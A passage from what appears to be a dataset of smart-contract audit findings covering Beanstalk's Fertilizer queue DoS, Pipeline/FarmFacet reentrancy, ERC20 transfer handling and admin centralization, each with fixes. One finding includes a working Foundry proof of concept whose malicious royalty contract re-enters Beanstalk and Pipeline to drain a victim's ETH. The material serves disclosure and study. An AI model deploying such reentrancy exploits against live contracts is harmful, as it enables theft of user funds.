these functions.\\nThe impact is low for `Sponsorship` deployment, but for `Operator` deployment, `ClonesUpgradeable.cloneDeterministic` is used with a salt based on the operator token name and the operator address. 
An attacker can abuse this to cause DoS for deployment.\\nWe see that this validation is implemented correctly in other contracts like `Operator`.\\n```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n",Add a validation to ensure the caller is the actual DATA contract.,Attackers can prevent the deployment of `Operator` contracts.,```\\n if (msg.sender != address(token)) {\\n revert AccessDeniedDATATokenOnly();\\n }\\n```\\n +"Insufficient validation of new Fertilizer IDs allow for a denial-of-service (DoS) attack on `SeasonFacet::gm` when above peg, once the last element in the FIFO is paid",medium,"A Fertilizer NFT can be interpreted as a bond without an expiration date which is to be repaid in Beans and includes interest (Humidity). This bond is placed in a FIFO list and intended to recapitalize the $77 million in liquidity stolen during the April 2022 exploit. One Fertilizer can be purchased for 1 USD worth of WETH: prior to BIP-38, this purchase was made using USDC.\\nEach fertilizer is identified by an Id that depends on `s.bpf`, indicating the cumulative amount of Beans paid per Fertilizer. This value increases each time `Sun::rewardToFertilizer` is called, invoked by `SeasonFacet::gm` if the Bean price is above peg. Therefore, Fertilizer IDs depend on `s.bpf` at the moment of minting, in addition to the amount of Beans to be paid.\\nThe FIFO list has following components:\\ns.fFirst: Fertilizer Id corresponding to the next Fertilizer to be paid.\\ns.fLast: The highest active Fertilizer Id which is the last Fertilizer to be paid.\\ns.nextFid: Mapping from Fertilizer Id to Fertilizer id, indicating the next element of a linked list. If an Id points to 0, then there is no next element.\\nMethods related to this FIFO list include: LibFertilizer::push: Add an element to the FIFO list. 
LibFertilizer::setNext: Given a fertilizer id, add a pointer to next element in the list LibFertilizer::getNext: Get next element in the list.\\nThe intended behaviour of this list is to add a new element to its end whenever a new fertilizer is minted with a new Id. Intermediate addition to the list was formerly allowed only by the Beanstalk DAO, but this functionality has since been deprecated in the current upgrade with the removal of `FertilizerFacet::addFertilizerOwner`.\\nConsequences of replacing BEAN:3CRV MetaPool with the BEAN:ETH Well: Before this upgrade, addition of 0 Fertilizer through `LibFertilizer::addFertilizer` was impossible due to the dependency on Curve in LibFertilizer::addUnderlying:\\n```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n\\nHowever, with the change of dependency involved in the Wells integration, this restriction no longer holds:\\n```\\n function addUnderlying(uint256 usdAmount, uint256 minAmountOut) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // Calculate how many new Deposited Beans will be minted\\n uint256 percentToFill = usdAmount.mul(C.precision()).div(\\n remainingRecapitalization()\\n 
);\\n uint256 newDepositedBeans;\\n if (C.unripeBean().totalSupply() > s.u[C.UNRIPE_BEAN].balanceOfUnderlying) {\\n newDepositedBeans = (C.unripeBean().totalSupply()).sub(\\n s.u[C.UNRIPE_BEAN].balanceOfUnderlying\\n );\\n newDepositedBeans = newDepositedBeans.mul(percentToFill).div(\\n C.precision()\\n );\\n }\\n\\n // Calculate how many Beans to add as LP\\n uint256 newDepositedLPBeans = usdAmount.mul(C.exploitAddLPRatio()).div(\\n DECIMALS\\n );\\n\\n // Mint the Deposited Beans to Beanstalk.\\n C.bean().mint(\\n address(this),\\n newDepositedBeans\\n );\\n\\n // Mint the LP Beans to the Well to sync.\\n C.bean().mint(\\n address(C.BEAN_ETH_WELL),\\n newDepositedLPBeans\\n );\\n\\n // @audit If nothing was previously deposited this function returns 0, IT DOES NOT REVERT\\n uint256 newLP = IWell(C.BEAN_ETH_WELL).sync(\\n address(this),\\n minAmountOut\\n );\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(usdAmount);\\n }\\n```\\n\\nGiven that the new integration does not revert when attempting to add 0 Fertilizer, it is now possible to add a self-referential node to the end FIFO list, but only if this is the first Fertilizer NFT to be minted for the current season by twice calling `FertilizerFacet.mintFertilizer(0, 0, 0, mode)`. 
The validation performed to prevent duplicate ids is erroneously bypassed given the Fertilizer amount for the given Id remains zero.\\n```\\n function push(uint128 id) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (s.fFirst == 0) {\\n // Queue is empty\\n s.season.fertilizing = true;\\n s.fLast = id;\\n s.fFirst = id;\\n } else if (id <= s.fFirst) {\\n // Add to front of queue\\n setNext(id, s.fFirst);\\n s.fFirst = id;\\n } else if (id >= s.fLast) { // @audit this block is entered twice\\n // Add to back of queue\\n setNext(s.fLast, id); // @audit the second time, a reference is added to the same id\\n s.fLast = id;\\n } else {\\n // Add to middle of queue\\n uint128 prev = s.fFirst;\\n uint128 next = getNext(prev);\\n // Search for proper place in line\\n while (id > next) {\\n prev = next;\\n next = getNext(next);\\n }\\n setNext(prev, id);\\n setNext(id, next);\\n }\\n }\\n```\\n\\nDespite first perhaps seeming harmless, this element can never be remove unless otherwise overridden:\\n```\\n function pop() internal returns (bool) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n uint128 first = s.fFirst;\\n s.activeFertilizer = s.activeFertilizer.sub(getAmount(first)); // @audit getAmount(first) would return 0\\n uint128 next = getNext(first);\\n if (next == 0) { // @audit next != 0, therefore this conditional block is skipped\\n // If all Unfertilized Beans have been fertilized, delete line.\\n require(s.activeFertilizer == 0, ""Still active fertilizer"");\\n s.fFirst = 0;\\n s.fLast = 0;\\n s.season.fertilizing = false;\\n return false;\\n }\\n s.fFirst = getNext(first); // @audit this gets s.first again\\n return true; // @audit always returns true for a self-referential node\\n }\\n```\\n\\n`LibFertilizer::pop` is used in `Sun::rewardToFertilizer` which is called through `Sun::rewardBeans` when fertilizing. This function is called through `Sun::stepSun` if the current Bean price is above peg. 
By preventing the last element from being popped from the list, assuming this element is reached, an infinite loop occurs given that the `while` loop continues to execute, resulting in denial-of-service on `SeasonFacet::gm` when above peg.\\nThe most remarkable detail of this issue is that this state can be forced when above peg and having already been fully recapitalized. Given that it is not possible to mint additional Fertilizer with the associated Beans, this means that a DoS attack can be performed on `SeasonFacet::gm` once recapitalization is reached if the BEAN price is above peg.","Despite being a complex issue to explain, the solution is as simple as replacing `>` with `>=` in `LibFertilizer::addFertilizer` as below:\\n```\\n function addFertilizer(\\n uint128 season,\\n uint256 fertilizerAmount,\\n uint256 minLP\\n ) internal returns (uint128 id) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n\\n uint128 fertilizerAmount128 = fertilizerAmount.toUint128();\\n\\n // Calculate Beans Per Fertilizer and add to total owed\\n uint128 bpf = getBpf(season);\\n s.unfertilizedIndex = s.unfertilizedIndex.add(\\n fertilizerAmount.mul(bpf)\\n );\\n // Get id\\n id = s.bpf.add(bpf);\\n // Update Total and Season supply\\n s.fertilizer[id] = s.fertilizer[id].add(fertilizerAmount128);\\n s.activeFertilizer = s.activeFertilizer.add(fertilizerAmount);\\n // Add underlying to Unripe Beans and Unripe LP\\n addUnderlying(fertilizerAmount.mul(DECIMALS), minLP);\\n // If not first time adding Fertilizer with this id, return\\n// Remove the line below\\n if (s.fertilizer[id] > fertilizerAmount128) return id;\\n// Add the line below\\n if (s.fertilizer[id] >= fertilizerAmount128) return id; // prevent infinite loop in `Sun::rewardToFertilizer` when attempting to add 0 Fertilizer, which could DoS `SeasonFacet::gm` when recapitalization is fulfilled\\n // If first time, log end Beans Per Fertilizer and add to Season queue.\\n push(id);\\n emit SetFertilizer(id, 
bpf);\\n }\\n```\\n","It is possible to perform a denial-of-service (DoS) attack on `SeasonFacet::gm` if the Bean price is above the peg, either once fully recapitalized or when reaching the last element of the Fertilizer FIFO list.\\nProof of Concept: This coded PoC can be run by:\\nCreating file `Beantalk/protocol/test/POCs/mint0Fertilizer.test.js`\\nNavigating to `Beantalk/protocol`\\nRunning `yarn test --grep ""DOS last fertilizer payment through minting 0 fertilizers""`","```\\n// Previous code\\n\\n function addUnderlying(uint256 amount, uint256 minAmountOut) internal {\\n //// rest of code\\n C.bean().mint(\\n address(this),\\n newDepositedBeans.add(newDepositedLPBeans)\\n );\\n\\n // Add Liquidity\\n uint256 newLP = C.curveZap().add_liquidity(\\n C.CURVE_BEAN_METAPOOL, // where to add liquidity\\n [\\n newDepositedLPBeans, // BEANS to add\\n 0,\\n amount, // USDC to add\\n 0\\n ], // how much of each token to add\\n minAmountOut // min lp ampount to receive\\n ); // @audit-ok Does not admit depositing 0 --> https://etherscan.io/address/0x5F890841f657d90E081bAbdB532A05996Af79Fe6#code#L487\\n\\n // Increment underlying balances of Unripe Tokens\\n LibUnripe.incrementUnderlying(C.UNRIPE_BEAN, newDepositedBeans);\\n LibUnripe.incrementUnderlying(C.UNRIPE_LP, newLP);\\n\\n s.recapitalized = s.recapitalized.add(amount);\\n }\\n```\\n" +Use safe transfer for ERC20 tokens,medium,"The protocol intends to support all ERC20 tokens but the implementation uses the original transfer functions. Some tokens (like USDT) do not implement the EIP20 standard correctly and their transfer/transferFrom function return void instead of a success boolean. 
Calling these functions with the correct EIP20 function signatures will revert.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");\\n }\\n```\\n",We recommend using OpenZeppelin's SafeERC20 versions with the safeTransfer and safeTransferFrom functions that handle the return value check as well as non-standard-compliant tokens.,"Tokens that do not correctly implement the EIP20 like USDT, will be unusable in the protocol as they revert the transaction because of the missing return value.","```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");//@audit-issue will revert for USDT\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");\\n }\\n```\\n" +Fee-on-transfer tokens are not supported,medium,"The protocol intends to support all ERC20 tokens but does not support fee-on-transfer tokens. 
The protocol utilizes the functions `TransferUtils::_transferERC20()` and `TransferUtils::_transferFromERC20()` to transfer ERC20 tokens.\\n```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n\\nThe implementation verifies that the transfer was successful by checking that the balance of the recipient is greater than or equal to the initial balance plus the amount transferred. This check will fail for fee-on-transfer tokens because the actual received amount will be less than the input amount. (Read here about fee-on-transfer tokens)\\nAlthough there are very few fee-on-transfer tokens, the protocol can't say it supports all ERC20 tokens if it doesn't support these weird ERC20 tokens.",The transfer utility functions can be updated to return the actually received amount. Or clearly document that only standard ERC20 tokens are supported.,"Fee-on-transfer tokens can not be used for the protocol. 
Because of the rarity of these tokens, we evaluate this finding as a Medium risk.","```\\nTransferUtils.sol\\n function _transferERC20(address token, address to, uint256 amount) internal {\\n IERC20 erc20 = IERC20(token);\\n require(erc20 != IERC20(address(0)), ""Token Address is not an ERC20"");\\n uint256 initialBalance = erc20.balanceOf(to);\\n require(erc20.transfer(to, amount), ""ERC20 Transfer failed"");\\n uint256 balance = erc20.balanceOf(to);\\n require(balance >= (initialBalance + amount), ""ERC20 Balance check failed"");//@audit-issue reverts for fee on transfer token\\n }\\n```\\n" +Centralization risk,medium,"The protocol has an owner with privileged rights to perform admin tasks that can affect users. Especially, the owner can change the fee settings and reward handler address.\\nValidation is missing for admin fee setter functions.\\n```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, ""Fee percentage must be less than 1"");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n\\nImportant changes initiated by admin should be logged via events.\\n```\\nFile: helpers/FeeData.sol\\n\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n\\n function setMaxHops(uint256 maxHops) external onlyOwner {\\n\\n function setMaxSwaps(uint256 maxSwaps) external onlyOwner {\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {\\n\\n function setFeeToken(address feeTokenAddress) public onlyOwner {\\n\\n function setFeeTokens(address[] memory feeTokenAddresses) public onlyOwner {\\n\\n function clearFeeTokens() public onlyOwner {\\n```\\n\\n```\\nFile: helpers/TransferHelper.sol\\n\\n function setRewardHandler(address rewardAddress) external onlyOwner {\\n\\n function setRewardsActive(bool _rewardsActive) external onlyOwner {\\n```\\n",Specify the owner's privileges 
and responsibilities in the documentation.\\nAdd constant state variables that can be used as the minimum and maximum values for the fee settings.\\nAdd proper validation for the admin functions.\\nLog the changes in the important state variables via events.,"While the protocol owner is regarded as a trusted party, the owner can change the fee settings and reward handler address without any validation or logging. This can lead to unexpected results and users can be affected.","```\\nFeeData.sol\\n function setFeeValue(uint256 feeValue) external onlyOwner {\\n require(feeValue < _feeDenominator, ""Fee percentage must be less than 1"");\\n _feeValue = feeValue;\\n }\\n\\n function setFixedFee(uint256 fixedFee) external onlyOwner {//@audit-issue validate min/max\\n _fixedFee = fixedFee;\\n }\\n```\\n" +Validation is missing for tokenA in `SwapExchange::calculateMultiSwap()`,low,"The protocol supports claiming a chain of swaps and the function `SwapExchange::calculateMultiSwap()` is used to do some calculations including the amount of tokenA that can be received for a given amount of tokenB. Looking at the implementation, the protocol does not validate that the tokenA of the last swap in the chain is actually the same as the tokenA of `multiClaimInput`. Because this view function is supposed to be used by the frontend to 'preview' the result of a `MultiSwap`, this does not imply a direct security risk but can lead to unexpected results. 
(It is notable that the actual swap function `SwapExchange::_claimMultiSwap()` implemented a proper validation.)\\n```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n 
calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n",Add a validation that the tokenA of the last swap in the chain is the same as the tokenA of `multiClaimInput`.,The function will return an incorrect swap calculation result if the last swap in the chain has a different tokenA than the tokenA of `multiClaimInput` and it can lead to unexpected results.,"```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, 
swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n" +Intermediate value sent by the caller can be drained via reentrancy when `Pipeline` execution is handed off to an untrusted external contract,high,"Pipeline is a utility contract created by the Beanstalk Farms team that enables the execution of an arbitrary number of valid actions in a single transaction. The `DepotFacet` is a wrapper around Pipeline for use within the Beanstalk Diamond proxy. When utilizing Pipeline through the `DepotFacet`, Ether value is first loaded by a payable call to the Diamond proxy fallback function, which then delegates execution to the logic of the respective facet function. 
Once the `DepotFacet::advancedPipe` is called, for example, value is forwarded on to a function of the same name within Pipeline.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n\\nThe important point to note here is that rather than sending the full Ether amount received by the Diamond proxy, the amount sent to Pipeline is equal to that of the `value` argument above, necessitating the use of `LibEth::refundEth`, which itself transfers the entire proxy Ether balance to the caller, following the call to return any unspent Ether.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, ""Eth transfer Failed."");\\n }\\n}\\n```\\n\\nThis logic appears to be correct and work as intended; however, issues can arise due to the lack of reentrancy guard on `DepotFacet` and `Pipeline` functions. 
Given the nature of `Pipeline` calls to potentially untrusted external contracts, which themselves may also hand off execution to their own set of untrusted external contracts, this can become an issue if a malicious contract calls back into Beanstalk and/or `Pipeline`.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n returns (bytes[] memory results) {\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n }\\n```\\n\\nContinuing with the example of `DepotFacet::advancedPipe`, say, for example, one of the pipe calls involves an NFT mint/transfer in which some external contract is paid royalties in the form of a low-level call with ETH attached or some safe transfer check hands-off execution in this way, the malicious recipient could initiate a call to the Beanstalk Diamond which once again triggers `DepotFacet::advancedPipe` but this time with an empty `pipes` array. Given the implementation of `Pipeline::advancedPipe` above, this will simply return an empty bytes array and fall straight through to the ETH refund. Since the proxy balance is non-zero, assuming `value != msg.value` in the original call, this `msg.value - value` difference will be transferred to the malicious caller. Once execution returns to the original context and the original caller's transaction is nearing completion, the contract will no longer have any excess ETH, even though it is the original caller who should have received a refund of unspent funds.\\nThis finding also applies to `Pipeline` itself, in which a malicious contract can similarly reenter `Pipeline` and utilize intermediate Ether balance without sending any `value` of their own. 
For example, given `getEthValue` does not validate the clipboard `value` against the payable `value` (likely due to its current usage within a loop), `Pipeline::advancedPipe` could be called with a single `AdvancedPipeCall` with normal pipe encoding which calls another address owned by the attacker, again forwarding all remaining Ether given they are able to control the `value` parameter. It is, of course, feasible that the original caller attempts to perform some other more complicated pipes following the first, which may revert with 'out of funds' errors, causing the entire advanced pipe call to fail if no tolerant mode behavior is implemented on the target contract, so the exploiter would need to be strategic in these scenarios if they wish to elevate their exploit from denial-of-service to the stealing of funds.","Add reentrancy guards to both the `DepotFacet` and `Pipeline`. Also, consider validating clipboard Ether values in `Pipeline::_advancedPipe` against the payable function value in `Pipeline::advancedPipe`.","A malicious external contract handed control of execution during the lifetime of a Pipeline call can reenter and steal intermediate user funds. 
As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of an NFT royalty recipient, for example, to re-enter both Beanstalk and Pipeline, draining funds remaining in the Diamond and Pipeline that should have been refunded to/utilized by the original caller at the end of execution:\\n```\\ncontract DepotFacetPoC is Test {\\n RoyaltyRecipient exploiter;\\n address exploiter1;\\n DummyNFT dummyNFT;\\n address victim;\\n\\n function setUp() public {\\n vm.createSelectFork(""mainnet"", ATTACK_BLOCK);\\n\\n exploiter = new RoyaltyRecipient();\\n dummyNFT = new DummyNFT(address(exploiter));\\n victim = makeAddr(""victim"");\\n vm.deal(victim, 10 ether);\\n\\n exploiter1 = makeAddr(""exploiter1"");\\n console.log(""exploiter1: "", exploiter1);\\n\\n address _pipeline = address(new Pipeline());\\n vm.etch(PIPELINE, _pipeline.code);\\n\\n vm.label(BEANSTALK, ""Beanstalk Diamond"");\\n vm.label(address(dummyNFT), ""DummyNFT"");\\n vm.label(address(exploiter), ""Exploiter"");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(""Victim balance before: "", victim.balance);\\n emit log_named_uint(""BEANSTALK balance before: "", BEANSTALK.balance);\\n emit log_named_uint(""PIPELINE balance before: "", PIPELINE.balance);\\n emit log_named_uint(""DummyNFT balance before: "", address(dummyNFT).balance);\\n emit log_named_uint(""Exploiter balance before: "", address(exploiter).balance);\\n emit log_named_uint(""Exploiter1 balance before: "", exploiter1.balance);\\n\\n vm.startPrank(victim);\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(dummyNFT), abi.encodePacked(dummyNFT.mintNFT.selector), abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(1 ether)));\\n IBeanstalk(BEANSTALK).advancedPipe{value: 10 ether}(pipes, 4 ether);\\n vm.stopPrank();\\n\\n emit log_named_uint(""Victim balance after: "", victim.balance);\\n emit 
log_named_uint(""BEANSTALK balance after: "", BEANSTALK.balance);\\n emit log_named_uint(""PIPELINE balance after: "", PIPELINE.balance);\\n emit log_named_uint(""DummyNFT balance after: "", address(dummyNFT).balance);\\n emit log_named_uint(""Exploiter balance after: "", address(exploiter).balance);\\n emit log_named_uint(""Exploiter1 balance after: "", exploiter1.balance);\\n }\\n}\\n\\ncontract DummyNFT {\\n address immutable i_royaltyRecipient;\\n constructor(address royaltyRecipient) {\\n i_royaltyRecipient = royaltyRecipient;\\n }\\n\\n function mintNFT() external payable returns (bool success) {\\n // imaginary mint/transfer logic\\n console.log(""minting/transferring NFT"");\\n // console.log(""msg.value: "", msg.value);\\n\\n // send royalties\\n uint256 value = msg.value / 10;\\n console.log(""sending royalties"");\\n (success, ) = payable(i_royaltyRecipient).call{value: value}("""");\\n }\\n}\\n\\ncontract RoyaltyRecipient {\\n bool exploited;\\n address constant exploiter1 = 0xDE47CfF686C37d501AF50c705a81a48E16606F08;\\n\\n fallback() external payable {\\n console.log(""entered exploiter fallback"");\\n console.log(""Beanstalk balance: "", BEANSTALK.balance);\\n console.log(""Pipeline balance: "", PIPELINE.balance);\\n console.log(""Exploiter balance: "", address(this).balance);\\n if (!exploited) {\\n exploited = true;\\n console.log(""exploiting depot facet advanced pipe"");\\n IBeanstalk(BEANSTALK).advancedPipe(new AdvancedPipeCall[](0), 0);\\n console.log(""exploiting pipeline advanced pipe"");\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(exploiter1), """", abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(PIPELINE.balance)));\\n IPipeline(PIPELINE).advancedPipe(pipes);\\n }\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to net 9 additional Ether at the expense of the victim:\\n```\\nRunning 1 test for test/DepotFacetPoC.t.sol:DepotFacetPoC\\n[PASS] 
test_attack() (gas: 182190)\\nLogs:\\n exploiter1: 0xDE47CfF686C37d501AF50c705a81a48E16606F08\\n Victim balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n PIPELINE balance before: : 0\\n DummyNFT balance before: : 0\\n Exploiter balance before: : 0\\n Exploiter1 balance before: : 0\\n entered pipeline advanced pipe\\n msg.value: 4000000000000000000\\n minting/transferring NFT\\n sending royalties\\n entered exploiter fallback\\n Beanstalk balance: 6000000000000000000\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 100000000000000000\\n exploiting depot facet advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 6100000000000000000\\n exploiting pipeline advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n Victim balance after: : 0\\n BEANSTALK balance after: : 0\\n PIPELINE balance after: : 0\\n DummyNFT balance after: : 900000000000000000\\n Exploiter balance after: : 6100000000000000000\\n Exploiter1 balance after: : 3000000000000000000\\n```\\n","```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n" +`FarmFacet` functions are susceptible to the draining of intermediate value sent by the caller via reentrancy when execution is handed off to an untrusted external contract,high,"The `FarmFacet` enables multiple Beanstalk functions to be called in a single transaction using Farm calls. 
Any function stored in Beanstalk's EIP-2535 DiamondStorage can be called as a Farm call and, similar to the Pipeline calls originated in the `DepotFacet`, advanced Farm calls can be made within `FarmFacet` utilizing the ""clipboard"" encoding documented in `LibFunction`.\\nBoth `FarmFacet::farm` and `FarmFacet::advancedFarm` make use of the `withEth` modifier defined as follows:\\n```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n\\nUsed in conjunction with `LibEth::refundEth`, within the `DepotFacet`, for example, the call is identified as originating from the `FarmFacet` if `s.isFarm == 2`. This indicates that an ETH refund should occur at the end of top-level `FarmFacet` function call rather than intermediate Farm calls within Beanstalk so that the value can be utilized in subsequent calls.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, ""Eth transfer Failed."");\\n }\\n}\\n```\\n\\nSimilar to the vulnerabilities in `DepotFacet` and `Pipeline`, `FarmFacet` Farm functions are also susceptible to the draining of intermediate value sent by the caller via reentrancy by an untrusted and malicious external contract. 
